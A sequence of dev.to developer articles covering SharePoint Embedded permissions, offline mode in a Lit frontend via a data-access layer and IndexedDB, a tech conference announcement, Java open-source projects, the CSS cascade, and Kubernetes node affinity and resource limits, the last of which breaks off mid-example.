- **Curatorial Review App:** `ReadContent` permission is sufficient for jury members to access and review submissions. They can also leave private feedback notes for artists. Depending on permission settings, they might have access to view other jurors' notes. For administrators managing roles, additional permissions like `EnumeratePermissions`, `AddPermissions`, and `UpdatePermissions` might be necessary.
- **Public Artwork Gallery Website:** Since this is a public website, it only requires `ReadContent` permission to display the artwork information. There's no need for write access to modify content within SharePoint.

## Conclusion

By understanding applications, tenants, permissions, and roles, you're equipped to build secure and scalable solutions with SharePoint Embedded. This approach allows for granular control over user access and data, ensuring a robust foundation for your custom SharePoint Embedded experiences. Remember, this is just a starting point. As you delve deeper into SharePoint Embedded, you'll discover a vast array of possibilities for crafting unique and valuable applications!

## References

- *Containers and Files Security in SharePoint Embedded: [https://intranetfromthetrenches.substack.com/p/containers-files-security-in-sharepoint-embedded](https://intranetfromthetrenches.substack.com/p/containers-files-security-in-sharepoint-embedded)*
- *SharePoint Embedded authentication and authorization: [https://learn.microsoft.com/en-us/sharepoint/dev/embedded/concepts/app-concepts/auth](https://learn.microsoft.com/en-us/sharepoint/dev/embedded/concepts/app-concepts/auth)*
- *SharePoint Embedded app architecture: [https://learn.microsoft.com/en-us/sharepoint/dev/embedded/concepts/app-concepts/app-architecture](https://learn.microsoft.com/en-us/sharepoint/dev/embedded/concepts/app-concepts/app-architecture)*
- *Register file storage container type application permissions: [https://learn.microsoft.com/en-us/sharepoint/dev/embedded/concepts/app-concepts/register-api-documentation](https://learn.microsoft.com/en-us/sharepoint/dev/embedded/concepts/app-concepts/register-api-documentation)*
- *Man reading content of a filing cabinet by National Cancer Institute from Unsplash: [https://unsplash.com/es/fotos/foto-en-escala-de-grises-de-un-hombre-89rul39ox2I](https://unsplash.com/es/fotos/foto-en-escala-de-grises-de-un-hombre-89rul39ox2I)*
jaloplo
1,918,641
How having a Data Layer simplified Offline Mode in my frontend app - Part 1
You're done with a project and the product team comes to you and says: "Hey, I turned off my internet...
0
2024-07-15T14:02:07
https://dev.to/belgamo/how-having-a-data-layer-simplified-offline-mode-in-my-frontend-app-part-1-5ahc
offline, pwa, data, repository
You're done with a project and the product team comes to you and says: "Hey, I turned off my internet and the app died". You stop for a moment and don't recall seeing this requirement throughout the development. You're afraid, because whatever you answer will make them frustrated. Well, there's clearly a lack of communication, but you're as guilty as they are for not having raised it before.

## The Challenge

Our project was a very traditional web app, fully dependent on a network connection to work. The app wasn't designed to work offline at all, and we hadn't followed any of the offline-first patterns. When a route was accessed, a request was dispatched to get the data needed for that screen. If it succeeded, its result was stored in the local state of the component, which was then rerendered. Pretty simple, right? But it was also going against offline-first good practices. There was a good thing, though: the architectural decisions we made. We'll be talking about them in a bit, but let's focus on the problem first of all.

## Partial vs Full Offline experience

We faced a clear conflict with the product team that needed resolution ASAP. To product people, enabling offline mode might seem as simple as pressing a button, expecting everything to work out of the box. However, they often overlook that a lack of internet inherently limits the app's functionality. To address this, we scheduled a meeting to clarify their offline requirements. Did they need the entire app to work offline or just certain parts? Should all features be available, or only the essential ones?

This is crucial, and my first advice to you: thoroughly understand what the stakeholders want so you can make the right decisions. Failing to get this right initially can lead to back-and-forth discussions. With clear answers, you can determine the right approach for enabling offline capabilities.

In our case, we discovered they only needed offline functionality for a specific part of the app used by one user group. This realization simplified our task by at least 30%. Additionally, most writing operations could be disabled offline, allowing us to avoid the complex process of reconciliation/synchronization. Ultimately, it's about managing trade-offs and finding the best middle-ground solution.

## The Data Layer to the Rescue

One of the most powerful patterns when it comes to front-end development is to keep your UI as dumb as possible. There are several benefits to doing that, such as easy testability, debugging, and the possibility to **inject dependencies** into your components. This last one in particular was what saved our lives, because the data were abstracted into a completely separate layer and we were connecting it with the UI layer through **dependency injection**. It looked something like this:

![diagram showing the current app data flow](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hnbgfr2fkq38agvg3cvs.png)

So, in other words, there was an interface which was the only thing the UI layer knew about, and the `RemoteDAO` was being injected into it. That being said, we could simply create another implementation of the DAO replacing the `RemoteDAO`. However, this new implementation would communicate with local sources of data instead of trying to hit the remote endpoints.
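To make that seam concrete, the contract the UI depends on can be as small as this (an illustrative sketch with a placeholder entity type, not the project's actual code):

```ts
// The only thing the UI layer knows about: a data-access contract.
// Remote and local implementations are swapped behind it via injection.
export interface DAO<T> {
  list(): Promise<T[]>;
  get(id: string): Promise<T | undefined>;
  save(item: T): Promise<T | undefined>;
}
```

The todo app below names its concrete version of this contract `TodosDAO`.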
We would also need a caching step, which is when we store the remote data locally, something like this:

![diagram showing the new app data flow](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xf8cq2tijthgs40s9mhv.png)

## The implementation

To show you a practical example, I built a small todo application using Lit + Vite, but it applies to any framework. Think of an app where parents can assign tasks to their children, but some tasks need to be done away from home, so the children might face a poor connection or not have any connection at all. That's why we need to leverage offline features.

![animation showing the app in action](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0sohnxybhp5yglwqh6gx.gif)

On the app entry point, I inject my `RemoteTodosDAO` instance by using Lit context (similar to React context or a DI container):

```ts
@customElement("main-app")
export class App extends LitElement {
  @provide({ context: TodosDAOContext })
  remoteTodosDAO = new RemoteTodosDAO();
  ...
}
```

Then, I'm able to get this instance from any component by doing:

```ts
@customElement("todos-page")
export class TodosPage extends LitElement {
  @consume({ context: TodosDAOContext })
  todosDAO!: TodosDAO;
}
```

By the way, here's what the `RemoteTodosDAO` looked like:

```ts
import axios from "axios";
import { Todo, TodosDAO } from "./types";

export class RemoteTodosDAO implements TodosDAO {
  private _httpClient = axios.create({ baseURL: "http://localhost:3000" });

  async list() {
    return (await this._httpClient.get<Todo[]>("/todos")).data;
  }

  async get(id: string) {
    return (await this._httpClient.get<Todo>(`/todos/${id}`)).data;
  }

  async save(todo: Todo) {
    return (
      await this._httpClient.patch<Todo>(`/todos/${todo.id}`, {
        ...todo,
      })
    ).data;
  }
}
```

## Caching data locally

I've mentioned our app was triggering requests as necessary when the user got to some route. But since we must cache all data on the first load, we decided to fetch all needed resources (hitting all endpoints) right when the user accesses the app for the first time. By doing that, we don't have to change anything in the UI layer and we can continue triggering requests when the component is mounted. But instead of reaching the remote source, the app will get the cached data.

As an alternative to hitting all endpoints at once, you could also create a single endpoint on the backend to get the data in a one-way trip. But remember to take performance into account. Are your users mostly on 4G connections or Wifi? How heavy is your data? You'll want to return as little data as possible to not waste resources, return only the most recent records if your scenario allows it, or even implement pagination.

Now we're going to create a new class to interact with IndexedDB using [Dexie](https://dexie.org/), a wrapper that makes it easier to create schemas. It works the same way as the DAO, but I'm going to name it "Persistor" for convenience. I'm also including the word "progress" in the table name on purpose; I'll explain why in the second part of the article.

```ts
import Dexie, { type EntityTable } from "dexie";

const TodosProgressLocalDB = new Dexie("TodosProgress") as Dexie & {
  todos: EntityTable<Todo>;
};

TodosProgressLocalDB.version(1).stores({
  todos: "&id",
});

export class DexiePersistor implements TodosPersistor {
  async saveBatch(todos: Todo[]) {
    await TodosProgressLocalDB.todos.bulkPut(todos);
  }
}
```

Next, let's update our `RemoteTodosDAO` to receive an instance of the persistor.
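The `TodosPersistor` contract itself never appears in the article; judging from how it is used here, it is presumably as small as this (a sketch, not the author's exact code):

```ts
import { Todo } from "./types";

// Inferred persistor contract: anything that can cache a batch of todos locally.
export interface TodosPersistor {
  saveBatch(todos: Todo[]): Promise<void>;
}
```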
Given that this app is fairly simple and the `GET /todos` endpoint returns all the necessary data, we'll pass its response to the persistor's `saveBatch` method. However, if your app requires multiple requests interacting with different persistors, you can adjust accordingly. Essentially, every time the user accesses the app, we will invalidate the local cache by rehydrating it with fresh data. To optimize performance and reduce backend load, consider some [invalidation strategies](https://medium.com/@lordmoma/the-hard-thing-in-computer-science-cache-invalidation-11ca0da2dba4) to avoid hitting the backend on every single request.

```ts
export class RemoteTodosDAO implements TodosDAO {
  private _todosPersistor: TodosPersistor;

  constructor(todosPersistor: TodosPersistor) {
    this._todosPersistor = todosPersistor;
  }

  private _httpClient = axios.create({ baseURL: "http://localhost:3000" });

  async list() {
    const data = (await this._httpClient.get<Todo[]>("/todos")).data;
    // Cache the fresh data locally before returning it to the UI
    this._todosPersistor.saveBatch(data);
    return data;
  }

  async get(id: string) {
    ...
  }

  async save(todo: Todo) {
    ...
  }
}
```

As long as the user lands on a route within the app, the request will be triggered and the response cached. One of the drawbacks of this approach is that it increases the first-load time, so make sure you show some kind of spinner to indicate that the page is loading. Something like this:

```ts
@customElement("main-app")
export class App extends LitElement {
  todosPersistor: TodosPersistor = new DexiePersistor();

  @provide({ context: TodosDAOContext })
  remoteTodosDAO = new RemoteTodosDAO(this.todosPersistor);

  private outletRef = createRef();

  @state()
  caching = true;

  async firstUpdated() {
    try {
      await this.remoteTodosDAO.list();
    } catch (error) {
      // If the fetch fails, fall back to whatever is already cached
    } finally {
      this.caching = false;
    }
    makeRouter(this.outletRef.value as HTMLElement);
  }

  render() {
    return html`
      ${this.caching ? html`<p>Caching resources...</p>` : null}
      <div ${ref(this.outletRef)}></div>
    `;
  }
}
```

If you check the Application tab in the browser inspector, you're going to notice that some data has already been recorded into the IndexedDB collections, which means we're ready to go to the next and last step to make the **reading part** work.

## Replacing the DAO implementation

All we need to do now is create the new implementation of the `TodosDAO` interface, which is going to be used as a replacement for the current one.

```ts
export class LocalTodosDAO implements TodosDAO {
  async list(): Promise<Todo[]> {
    return await TodosProgressLocalDB.todos.toArray();
  }

  async get(id: string) {
    return await TodosProgressLocalDB.todos.where("id").equals(id).first();
  }

  save(todo: Todo): Promise<Todo | undefined> {
    throw new Error("Method not implemented.");
  }
}
```

I left the save method not implemented on purpose as well, because I'll be clarifying it in the second part of this article. Alright, let's replace the implementation:

```ts
export class App extends LitElement {
  todosPersistor: TodosPersistor = new DexiePersistor();

  remoteTodosDAO = new RemoteTodosDAO(this.todosPersistor);

  @provide({ context: TodosDAOContext })
  localTodosDAO = new LocalTodosDAO();
  ...
}
```

Now you should be able to turn off your backend server and the app will keep working normally, except for the writing operations.

## PWA & Routing concerns

Regarding caching, there are basically two types of resources: assets and data.
We just handled data, but in order for your app to really work offline you also need to cache the static assets, such as HTML, CSS, and JS, by using a service worker and a manifest file. That's a simple step, and if you're using Vite you can achieve it pretty easily with [Vite PWA](https://vite-pwa-org.netlify.app/).

You might need to tweak your routes as well if you're using code-splitting. Code-splitting essentially fetches the assets on demand for a given route to work. However, you don't want your user to have to access every route in your system beforehand just to get them cached, right? So make sure you disable that, at least for the routes you want to work offline.

## Conclusion

Offline mode isn't a trivial topic. It's hard enough when developing a PWA from scratch following offline-first good practices; adding it to an existing app is even harder. However, it's possible to work around it and achieve good results if you keep things uncoupled and fully understand the real customer needs. As demonstrated, we managed to get the app functioning offline without altering the UI layer.

In the second part, we'll explore how to enable users to perform writing operations offline.

The example code is available on GitHub: https://github.com/belgamo/partial-offline-poc
belgamo
1,918,731
Infobip Shift returns to Zadar in 2024 – get ready for 3 days of tech innovation and expertise
One of Europe’s premier tech events is returning to Croatia, and for the first time, the event will...
0
2024-07-17T13:05:38
https://shiftmag.dev/infobip-shift-returns-to-zadar-in-2024-get-ready-for-3-days-of-tech-innovation-and-expertise-3663/
event, ai, cybersecurity, programming
---
title: Infobip Shift returns to Zadar in 2024 – get ready for 3 days of tech innovation and expertise
published: true
date: 2024-07-05 09:13:09 UTC
tags: Event,AI,cybersecurity,programming
canonical_url: https://shiftmag.dev/infobip-shift-returns-to-zadar-in-2024-get-ready-for-3-days-of-tech-innovation-and-expertise-3663/
---

![](https://shiftmag.dev/wp-content/uploads/2024/07/Shift.png?x43006)

One of Europe’s premier tech events is returning to Croatia, and for the first time, **the event will span three days**, gathering thousands from the global IT industry for the fourth consecutive year.

[The conference](https://shift.infobip.com/) kicks off on Sunday, September 15, with **several smaller, diverse, and informal tech events across various locations** in Zadar. The main event continues over the next two days at SC Višnjik.

“Infobip Shift aims to innovate each year, enhancing the program, production, and content. Extending to three days increases networking opportunities, a key reason many attend. With **over 80 speakers on six stages**, we strive to invest in the conference, raising its value and setting new standards for tech events”, says Nikola Radesic, Head of Shift Team.

## What’s in store at Infobip Shift 2024?

Experts from tech giants such as **Microsoft, Spotify, and Reddit** will be present alongside companies well known to developers, like **Postman, JetBrains, and JFrog**. The conference will feature workshops, an EXPO hall with 30 exhibitors, and indoor and outdoor spaces for meetings and relaxation between sessions.

> This year’s topics at Infobip Shift include **ubiquitous AI, increasingly critical cybersecurity, and perennial subjects** like programming tools, front-end and back-end development, and cloud computing. We’ve shaped the program based on industry-relevant topics and feedback from last year’s attendees.
>
> <cite>Nikola Radesic, Head of Shift Team</cite>

## Showcasing startups, panels, and pitching competitions

A special program will be held in Infobip’s Startup Tribe hall, featuring booths of the most interesting **domestic and international startups, panels, and talks** vital for anyone starting or considering a startup. The pitching competition will spotlight startups, allowing them to **present their products to a panel of experts** and a range of global investors who may offer advice and possibly investment.

For impressions from last year’s event, watch the [video](https://www.youtube.com/watch?v=pBp3inVCh_g), and for more information on the conference, program, and tickets, visit Infobip Shift’s official [website](https://shift.infobip.com/).

The post [Infobip Shift returns to Zadar in 2024 – get ready for 3 days of tech innovation and expertise](https://shiftmag.dev/infobip-shift-returns-to-zadar-in-2024-get-ready-for-3-days-of-tech-innovation-and-expertise-3663/) appeared first on [ShiftMag](https://shiftmag.dev).
shiftmag
1,918,813
7 Open Source Projects You Should Know - Java Edition ✔️
Overview Hi everyone 👋🏼​ In this article, I'm going to look at seven OSS repository that...
27,756
2024-07-14T06:00:00
https://domenicotenace.dev/blog/seven-oss-projects-java-edition/
opensource, github, softwaredevelopment, java
## Overview

Hi everyone 👋🏼​

In this article, I'm going to look at seven OSS repositories written in Java that you should know - interesting projects that caught my attention and that I want to share.

Let's start 🤙🏼​

---

## 1. [Robolectric](https://robolectric.org/)

Robolectric is a unit testing framework for Android. Your tests run in a simulated Android environment inside a JVM, without the overhead and flakiness of an emulator. Tests routinely run 10x faster than those on cold-started emulators 😈

{% embed https://github.com/robolectric/robolectric %}

## 2. [Elasticsearch](https://www.elastic.co/elasticsearch)

Elasticsearch is a distributed search and analytics engine optimized for speed and relevance on production-scale workloads. Search in near real-time over massive datasets, perform vector searches, integrate with generative AI applications, and much more 🤠

{% embed https://github.com/elastic/elasticsearch %}

## 3. [dotCMS](https://www.dotcms.com/)

dotCMS is an open source headless/hybrid content management system that has been designed to manage and deliver personalized, permission-based content experiences across multiple channels. It can serve as a content hub and also as a platform for sites, mobile apps, mini-sites, portals, and intranets 🤖

{% embed https://github.com/dotCMS/core %}

## 4. [Apache Tika](https://tika.apache.org/)

The Apache Tika toolkit detects and extracts metadata and text from over a thousand different file types (such as PPT, XLS, and PDF). All of these file types can be parsed through a single interface, making Tika useful for search engine indexing, content analysis, translation, and much more 🤗

{% embed https://github.com/apache/tika %}

## 5. [GraalVM](https://www.graalvm.org/)

GraalVM is a high-performance JDK distribution that compiles your Java applications ahead of time into standalone binaries. These binaries start instantly, provide peak performance with no warmup, and use fewer resources 👾

{% embed https://github.com/oracle/graal %}

## 6. [OpenSearch](https://opensearch.org/docs/latest/about/)

OpenSearch is an open source, distributed, and RESTful search engine, forked from Elasticsearch and Kibana following the license change in early 2021 🔎

{% embed https://github.com/opensearch-project/OpenSearch %}

## 7. [ThingsBoard](https://thingsboard.io/)

ThingsBoard is an open-source IoT platform for data collection, processing, visualization, and device management. It enables device connectivity via industry-standard IoT protocols (MQTT, CoAP, and HTTP) and supports both cloud and on-premises deployments 🦾

{% embed https://github.com/thingsboard/thingsboard %}

---

## Conclusion

This list features seven open source projects that are worth checking out, whether to use them or even to contribute 🖖

Happy coding! ✨

---

Hi 👋🏻 My name is Domenico, a software developer passionate about the Vue.js framework; I write articles about it to share my knowledge and experience.

Don't forget to visit my Linktree to discover my projects 🫰🏻

Linktree: https://linktr.ee/domenicotenace

Follow me on dev.to for other articles 👇🏻

{% embed https://dev.to/dvalin99 %}

If you like my content or want to support my work on GitHub, you can support me with a very small donation. I would be grateful 🥹

<a href="https://www.buymeacoffee.com/domenicotenace"><img src="https://img.buymeacoffee.com/button-api/?text=Buy me a coffee&emoji=☕&slug=domenicotenace&button_colour=FFDD00&font_colour=000000&font_family=Cookie&outline_colour=000000&coffee_colour=ffffff" /></a>
dvalin99
1,918,816
Mastering CSS: Understanding the Cascade
Cascading Style Sheets (CSS) is a fundamental technology of the web, allowing developers to control...
0
2024-07-15T13:05:38
https://mustcode.it/articles/mastering-css-understanding-the-cascade
css, web, webdev
Cascading Style Sheets (CSS) is a fundamental technology of the web, allowing developers to control the visual presentation of HTML documents. While CSS syntax may seem simple at first glance, the way styles are applied and inherited can be surprisingly complex. Understanding these intricacies is crucial for writing efficient, maintainable, and predictable CSS. In this comprehensive guide, we'll explore the cascade and inheritance concepts of CSS.

## The CSS Cascade

The cascade is the algorithm that determines which CSS rules are applied to elements when multiple conflicting rules exist. It's essential to understand how the cascade works to write CSS that behaves as expected. The cascade considers several factors in the following order:

1. Stylesheet origin
2. Inline styles
3. Selector specificity
4. Source order

To be completely exhaustive, we can add:

- 2.5 Styles that are defined in layers [read more](https://developer.mozilla.org/en-US/docs/Web/CSS/@layer)
- 3.5 Styles that are scoped to a portion of the DOM [read more](https://developer.mozilla.org/en-US/docs/Web/CSS/@scope)

Let's break down the factors that influence the cascade, in order of precedence:

### 1. Stylesheet Origin

CSS can come from three different sources:

1. **User-agent styles**: These are the browser's default styles. Each browser has its own set of default styles, which is why unstyled HTML can look slightly different across browsers.
2. **User styles**: These are custom styles set by the user. While rare, some users may have custom stylesheets to override default styles for accessibility or personal preference.
3. **Author styles**: These are the styles you write as a web developer.

Generally, author styles take precedence over user styles, which in turn override user-agent styles. This allows developers to customise the appearance of elements while still respecting user preferences when necessary.

### 2. Inline Styles

Styles applied directly to an element using the style attribute have very high priority:

```html
<p style="color: red;">This text will be red.</p>
```

Inline styles will override any styles defined in external stylesheets or `<style>` tags, regardless of their specificity (that's no longer true if you use the `!important` keyword; I'll get to that in a second). Using inline styles is *generally* discouraged, as it mixes presentation with content and makes styles harder to maintain.

### 3. Selector Specificity

Specificity is a crucial concept in CSS that determines which styles are applied to an element when multiple conflicting rules exist. Each CSS selector has a specificity number, which can be calculated to predict which styles will take precedence. Specificity is typically represented as a four-part number (a,b,c,d), where:

* a: Number of inline styles (generally omitted)
* b: Number of ID selectors
* c: Number of class selectors, attribute selectors, and pseudo-classes
* d: Number of element selectors and pseudo-elements

The resulting number is not base 10. Instead, think of it as separate columns that are compared from left to right. See the examples:

- `p` = (0,0,0,1)
- `.class` = (0,0,1,0)
- `#id` = (0,1,0,0)
- Inline style = (1,0,0,0)

Consider these two conflicting rules:

```css
#header .nav li { color: blue; } /* (0,1,1,1) */
nav > li a { color: red; }       /* (0,0,0,3) */
```

The first rule (0,1,1,1) has higher specificity, so the text would be blue.
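Because the columns are compared left to right rather than read as a single base-10 number, the comparison is easy to express in code. A toy sketch (illustrative only; `Specificity` and `compareSpecificity` are made-up names, not a browser API):

```ts
type Specificity = [number, number, number, number]; // (inline, ids, classes, elements)

// Compare column by column, left to right; 1 means `a` wins, -1 means `b` wins.
function compareSpecificity(a: Specificity, b: Specificity): number {
  for (let i = 0; i < 4; i++) {
    if (a[i] !== b[i]) return a[i] > b[i] ? 1 : -1;
  }
  return 0; // tie: source order decides
}

compareSpecificity([0, 1, 1, 1], [0, 0, 0, 3]); // 1 -> "#header .nav li" wins
```

A tie (return value 0) falls through to source order, which is exactly the next factor in the cascade.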
> Pseudo-class selectors (such as `:hover`) and attribute selectors (such as `[type="text"]`) each have the same specificity as class selectors.
>
> The universal selector (`*`) and combinators (`>`, `+`, `~`) do not affect specificity.
>
> Also, the `:not()` pseudo-class doesn't add to the specificity value; only the selectors inside it are counted.

Several online tools can help calculate specificity ([https://specificity.keegan.st/](https://specificity.keegan.st/)).

### 4. Source Order

If all else is equal, the rule that appears later in the stylesheet takes precedence:

```css
.button { background-color: blue; }
.button { background-color: green; } /* This one wins */
```

In this example, buttons will have a green background.

## A Powerful Override

While understanding the cascade is crucial for writing maintainable CSS, there's one more piece of the puzzle that can override all the rules we've discussed so far: the !important keyword.

### How `!important` Works

The `!important` keyword can override all other considerations in the cascade, except for other `!important` declarations of higher origin precedence.

```css
/* styles.css */
.button {
  background-color: blue !important;
}
```

```html
<!-- index.html -->
<head>
  <link rel="stylesheet" href="styles.css">
</head>
<body>
  <button style="background-color: red">
    My button
  </button>
  <!-- The color will be blue due to !important above -->
</body>
```

In this example, even though inline styles usually have the highest priority, the button will still have a blue background because of the `!important` declaration.

### The Cascade and `!important`

The `!important` keyword actually introduces additional layers to the cascade. The full order of precedence, from highest to lowest, is:

- User-agent important declarations
- User important declarations
- Author important declarations
- Important inline styles
- Important non-inline styles
- Author normal declarations
- Inline styles
- Non-inline styles
- User normal declarations
- User-agent normal declarations

### When to Use it

While `!important` can be tempting as a quick fix, it's generally considered a last resort. Overuse can lead to specificity wars and make your CSS harder to maintain. Legitimate use cases include:

- Overriding third-party styles you can't modify
- Creating utility classes that should always apply
- Ensuring critical accessibility styles are applied

### A Potential Solution To Simplify Specificity Management

If you find yourself using !important often, consider refactoring your CSS to use more specific selectors, or a more modern approach like utilising `:is()` and `:where()` to write more flexible and maintainable styles. (I talk about these two in more detail [here](https://mustcode.it/articles/where-is-css))

Also, the `@layer` at-rule, which is fairly well [supported](https://caniuse.com/css-cascade-layers), allows you to create "layers" of styles with an explicitly defined order of precedence:

```css
@layer base, components, utilities;

@layer utilities {
  .btn {
    padding: 10px 20px;
  }
}

@layer components {
  .btn {
    padding: 1rem 2rem;
  }
}
```

This offers a more structured approach to managing style precedence without resorting to `!important` or engaging in a specificity arms race. However, I haven't used this in a production project myself; if you do, I'd love to hear about your experience :)

## Inheritance

### Passing Styles Down the DOM Tree

Inheritance is another fundamental concept in CSS.
Some CSS properties are inherited by default, meaning child elements will take on the computed values of their parents. This is particularly useful for text-related properties like `color`, `font`, `font-family`, `font-size`, `font-weight`, `font-variant`, `font-style`, `line-height`, `letter-spacing`, `text-align`, `text-indent`, `text-transform`, `white-space`, and `word-spacing`.

```css
body {
  font-family: Arial, sans-serif;
  color: #333;
  line-height: 1.5;
}
```

In this example, all text within the body will inherit these styles unless explicitly overridden. This allows for efficient styling of document-wide typography without having to repeat rules for every element.

> A few others inherit as well, such as the list properties: `list-style`, `list-style-type`, `list-style-position`, `list-style-image`, and some other table-related properties.

Not all properties are inherited by default. For example, border and padding are not inherited, which makes sense – you wouldn't want every child element to automatically have the same border as its parent.

### Inheritance keywords

CSS provides several keywords to give you fine-grained control over inheritance and to reset styles:

- The `inherit` keyword forces a property to inherit its value from its parent element (this can be useful for properties that don't inherit by default, like border).
- The `initial` keyword resets a property to its initial value as defined by the CSS specification (this can be helpful when you want to completely reset an element's styling).
- The `unset` keyword acts like inherit for inherited properties and initial for non-inherited properties (this provides a flexible way to reset properties without needing to know whether they're inherited or not).
- The `revert` keyword resets the property to the value it would have had if no author styles were applied (this is useful when you want to fall back to browser defaults rather than CSS-defined initial values).

The `initial` and `unset` keywords override all styles, affecting both author and user-agent stylesheets. This means they reset the element's styling to its default state, ignoring any previous styling rules applied by the author or the browser. However, there are scenarios where you only want to reset the styles you've defined in your author stylesheet, without disturbing the default styles provided by the browser (user-agent stylesheet). In such cases, the `revert` keyword is particularly useful. It specifically reverts the styles of an element back to the browser's default styles, effectively undoing any custom author-defined styles while preserving the inherent browser styling.

> Note that when using shorthand properties, **omitted values are implicitly set to their initial values.** This can potentially override other styles you've set elsewhere.

## Wrapping up

By understanding the intricacies of the cascade, inheritance, and modern CSS features, you'll be better equipped to write efficient, maintainable, and powerful stylesheets. Remember, CSS is not just about making things look good – it's about creating robust, flexible designs that work across a wide range of devices and browsers.
mustapha
1,918,818
40 Days Of Kubernetes (15/40)
Day 15/40 Kubernetes Node Affinity Explained Video Link @piyushsachdeva Git...
0
2024-07-16T15:10:08
https://dev.to/sina14/40-days-of-kubernetes-1540-1pl4
kubernetes, 40daysofkubernetes
## Day 15/40

# Kubernetes Node Affinity Explained

[Video Link](https://www.youtube.com/watch?v=5vimzBRnoDk)
@piyushsachdeva
[Git Repository](https://github.com/piyushsachdeva/CKA-2024/)
[My Git Repo](https://github.com/sina14/40daysofkubernetes)

We're going to understand node `affinity` in the `Kubernetes` system.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3gr7dcuz9ygnbla6ey10.png)
(Photo from the video)

---

Node `affinity` in `Kubernetes` is a set of rules used to specify preferences that affect how pods are placed on nodes. It allows you to constrain which nodes your `pod` is eligible to be scheduled on, based on labels on nodes and whether those labels match the rules.

Types of Node Affinity:

- **requiredDuringSchedulingIgnoredDuringExecution**: Pods will only be placed on nodes that match the specified rules. If no matching nodes are available, the pods won't be scheduled.
- **preferredDuringSchedulingIgnoredDuringExecution**: Specifies preferences that the scheduler will attempt to enforce but will not guarantee.

[source](https://overcast.blog/mastering-node-affinity-and-anti-affinity-in-kubernetes-db769af90f5c)

In simple words:

**requiredDuringSchedulingIgnoredDuringExecution** - It makes sure the `pod` only gets scheduled when the expression matches a node's labels.

**preferredDuringSchedulingIgnoredDuringExecution** - It tries to match the expression against node labels, but even if no match is found, the `pod` is still scheduled on some `node`.

---

#### Demo

[source](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/#schedule-a-pod-using-preferred-node-affinity)

```yaml
---
apiVersion: v1
kind: Pod
metadata:
  name: nginx
spec:
  affinity:
    nodeAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: disktype
            operator: In
            values:
            - ssd
  containers:
  - name: nginx
    image: nginx
```

- Run the pod:

```console
root@localhost:~# kubectl get pods --show-labels -o wide
NAME    READY   STATUS    RESTARTS   AGE   IP       NODE     NOMINATED NODE   READINESS GATES   LABELS
nginx   0/1     Pending   0          8s    <none>   <none>   <none>           <none>            <none>
```

- See the logs:

```
Events:
  Type     Reason            Age   From               Message
  ----     ------            ----  ----               -------
  Warning  FailedScheduling  82s   default-scheduler  0/3 nodes are available: 1 node(s) didn't match Pod's node affinity/selector, 1 node(s) had untolerated taint {gpu: true}, 1 node(s) had untolerated taint {node-role.kubernetes.io/control-plane: }. preemption: 0/3 nodes are available: 3 Preemption is not helpful for scheduling.
```

- Let's add a label to a node and see what happens:

```console
root@localhost:~# kubectl label node lucky-luke-worker disktype=ssd
node/lucky-luke-worker labeled
root@localhost:~# kubectl get pods --show-labels -o wide
NAME    READY   STATUS    RESTARTS   AGE     IP            NODE                NOMINATED NODE   READINESS GATES   LABELS
nginx   1/1     Running   0          6m19s   10.244.1.17   lucky-luke-worker   <none>           <none>            <none>
```

- Another example:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: redis
spec:
  affinity:
    nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:
      - weight: 1
        preference:
          matchExpressions:
          - key: disktype
            operator: In
            values:
            - hdd
  containers:
  - name: redis
    image: redis
```

- Run the pod:

```console
root@localhost:~# kubectl get pods --show-labels -o wide
NAME    READY   STATUS    RESTARTS   AGE   IP            NODE                NOMINATED NODE   READINESS GATES   LABELS
nginx   1/1     Running   0          22m   10.244.1.17   lucky-luke-worker   <none>           <none>            <none>
redis   1/1     Running   0          14s   10.244.1.18   lucky-luke-worker   <none>           <none>            <none>
```

- Let's delete the node label:

```console
root@localhost:~# kubectl label node lucky-luke-worker disktype-
node/lucky-luke-worker unlabeled
root@localhost:~# kubectl get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          29m
redis   1/1     Running   0          6m43s
```

As you can see, removing the label only affects pods created after that point; there's no change for the pods that are already running.

Also, there's an `operator: Exists`, which means the key's value doesn't matter: if the key exists, it matches.

---

#### Node Affinity vs Taints & Tolerations:

- A `taint` is a label that can be applied to a node in a Kubernetes cluster, which signifies that the node is not able to accept pods that do not have a corresponding `toleration`.
- A `toleration` is a label that can be applied to a pod, which signifies that the pod is able to tolerate a node with a matching taint.
- In Kubernetes, a `Node Selector` is a way to specify which nodes in a cluster a particular pod should be scheduled on. It works by assigning labels to nodes and then matching those labels with the pod's specification.
- In Kubernetes, `Node Affinity` is a way to specify rules that determine which nodes in a cluster a particular pod should be scheduled on. Node affinity can be used to ensure that pods are deployed on nodes with specific characteristics, such as available resources, location, or hardware capabilities.

[source](https://blog.devops.dev/taints-and-tollerations-vs-node-affinity-42ec5305e11a)
sina14
1,918,901
40 Days Of Kubernetes (16/40)
Day 16/40 Kubernetes Requests and Limits Video Link @piyushsachdeva Git...
0
2024-07-17T19:25:19
https://dev.to/sina14/40-days-of-kubernetes-1640-3670
kubernetes, 40daysofkubernetes
## Day 16/40 # Kubernetes Requests and Limits [Video Link](https://www.youtube.com/watch?v=Q-mk6EZVX_Q) @piyushsachdeva [Git Repository](https://github.com/piyushsachdeva/CKA-2024/) [My Git Repo](https://github.com/sina14/40daysofkubernetes) In this section we're looking to `resource`, `request` and `limit` which is another concept for scheduling our `pod`. With the `request` we define lower-band and with the `limit` the upper-band is defined for resources which is a pod needed For example: [source](https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/#example-1) ```yaml ... - name: log-aggregator image: images.my-company.example/log-aggregator:v6 resources: requests: memory: "64Mi" cpu: "250m" limits: memory: "128Mi" cpu: "500m" ... ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kt0iy2b2q0qs8jgo9ote.png) (Photo from the video) There're 2 common errors we will be faced, if a pod wants to exceeds the `limit`. One because of `node` limitation, **Insufficient Resources**, and another one because of the pod limitation, **OOM** error. --- #### Demo - Run the metrics server with the yaml file [here](https://raw.githubusercontent.com/piyushsachdeva/CKA-2024/main/Resources/Day16/metrics-server.yaml) ```console root@localhost:~# kubectl get pods -n kube-system NAME READY 